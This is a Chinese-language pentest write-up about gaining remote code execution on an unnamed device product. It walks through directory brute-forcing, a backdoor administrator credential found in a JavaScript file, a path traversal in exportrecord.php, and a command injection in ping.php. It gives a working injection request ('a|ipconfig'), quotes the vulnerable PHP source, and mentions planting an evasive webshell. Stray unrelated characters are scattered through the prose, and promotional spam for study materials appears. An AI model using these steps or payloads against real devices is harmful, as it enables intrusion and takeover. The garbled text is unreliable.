某設(shè)備產(chǎn)品漏洞挖掘-從JS文件挖掘RCE

u=296456683,2163195517&fm=26&fmt=auto.jpeg

前言

某次滲透過程中碰到了個設(shè)備產(chǎn)品搏存，通過一些黑盒測試小技巧獲取目標(biāo)權(quán)限

在這里插入圖片描述

信息收集

【點擊獲取網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】

2000多本網(wǎng)絡(luò)安全系列電子書

網(wǎng)絡(luò)安全標(biāo)準(zhǔn)題庫資料

項目源碼

網(wǎng)絡(luò)安全基礎(chǔ)入門肠牲、Linux、web安全觉既、攻防方面的視頻

網(wǎng)絡(luò)安全學(xué)習(xí)路線圖

首先拿到了目標(biāo)，同樣也需要對設(shè)備進行信息收集呻澜，登錄頁面有滑塊驗證和賬號密碼請求包加密

在這里插入圖片描述

暫時先放棄從JS里獲取密碼加密方法据忘，先嘗試找一些接口來獲取信息，查看源代碼

在這里插入圖片描述

訪問一下JS目錄讹语，這里有一個小技巧钙皮，當(dāng)目錄存在時會自動在后面加上 /, 例如瀏覽器訪問 /js, 將會變成 /js/ 來訪問

https://xxx.xxx.xxx.xxx/js

在這里插入圖片描述

這里簡單測試一下發(fā)現(xiàn)存在的目錄可以通過判斷403來確定目錄存在，對下一步文件爆破提供幫助顽决，這里使用Gobuster進行爆破

在這里插入圖片描述

獲取到的存在的目錄信息

/js/ (Status: 403)
/lan/ (Status: 403)
/php/ (Status: 403)
/images/ (Status: 403)
/html/ (Status: 403)
/vendors/ (Status: 403)
/upload/ (Status: 403)

我們需要注意的為 js 與 php 目錄下的文件株灸，才可能存在突破口，首先爆破 js目錄下的 js文件

在這里插入圖片描述

獲取后通過爬蟲遍歷 JS文件下載到本地翻閱擎值，其中發(fā)現(xiàn) /js/index.js 文件中有敏感信息，猜想可能是后門賬號或者默認(rèn)密碼

在這里插入圖片描述

拿著拿到的賬號去登錄一下試試

在這里插入圖片描述

成功登錄目標(biāo)系統(tǒng)逐抑，用戶為 administrator, 查看存在的用戶發(fā)現(xiàn)這個可能是后門賬戶

漏洞挖掘

任意文件讀取漏洞 (exportrecord.php)
目前我們以及獲取到了目標(biāo)的后臺管理權(quán)限鸠儿，且權(quán)限比較高，我們可以繼續(xù)測試漏洞
之前爆破到了 php目錄厕氨，猜測為功能性文件进每，我們可以通過 js文件中的信息獲取一些文件名和接口信息

在這里插入圖片描述

這里在 backup.js 文件中發(fā)現(xiàn)一個有關(guān)的下載接口

function downloadBak(index) {
    var data = $('#backupList').bootstrapTable("getData");
    if (index >= 0 && index < data.length) {
        var downurl = '../php/exportrecord.php?downname=' + data[index].id;
        window.open(downurl);
    }
}

猜測 downname參數(shù)為文件名，測試能不能下載文件

/php/exportrecord.php?downname=exportrecord.php

在這里插入圖片描述

這里得到了 /php/exportrecord.php 文件

傳入downname參數(shù)命斧，沒有對 ../ 符號過濾田晚，就導(dǎo)致跳目錄讀取文件
現(xiàn)在我們有了一個任意文件讀取，我們再通過目錄爆破獲取更多的PHP文件源碼

在這里插入圖片描述

遠程命令執(zhí)行漏洞 (ping.php)

通過剛剛到目錄爆破我們看到一個非常值得注意的文件 ping.php国葬，設(shè)備中常見的網(wǎng)絡(luò)聯(lián)通性測試文件贤徒，也是設(shè)備中常見的漏洞點, 通過文件讀取漏洞讀取文件

在這里插入圖片描述

function systemopr($type, $ip, $times=4){
     $info = array();     
     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){
           //linux
           if($type == "0"){
               exec("ping -c $times $ip", $info);
           }else if($type == "1"){
               exec("traceroute -m $times -w 1 $ip", $info);
           }else{
               exec($ip, $info);
          }
     }else{
          //windows
          if($type == "0"){
               exec("ping $ip -n $times", $info);
          }else if($type == "1"){
               exec("tracert -h $times -w 1000 $ip", $info);
          }else{
               exec($ip, $info);
          }
     }
     return $info;
}
?>

這里可以看到這里接收的參數(shù) jsondata數(shù)組中的 ip參數(shù)，用戶可控造成命令拼接汇四，而且通過 exec 執(zhí)行接奈，并且會 return到頁面中，導(dǎo)致回顯的RCE

POST /php/ping.php

jsondata[ip]=a|ipconfig&jsondata[type]=1

在這里插入圖片描述

目標(biāo)為Windows系統(tǒng)通孽，測試寫入phpinfo文件

在這里插入圖片描述

寫入免殺并流量加密的Webshell序宦，嘗試獲取目標(biāo)設(shè)備權(quán)限

在這里插入圖片描述

最后

點擊查看【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】，私信我獲取網(wǎng)絡(luò)安全學(xué)習(xí)資料

最后編輯于：2021.11.23 14:49:11

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者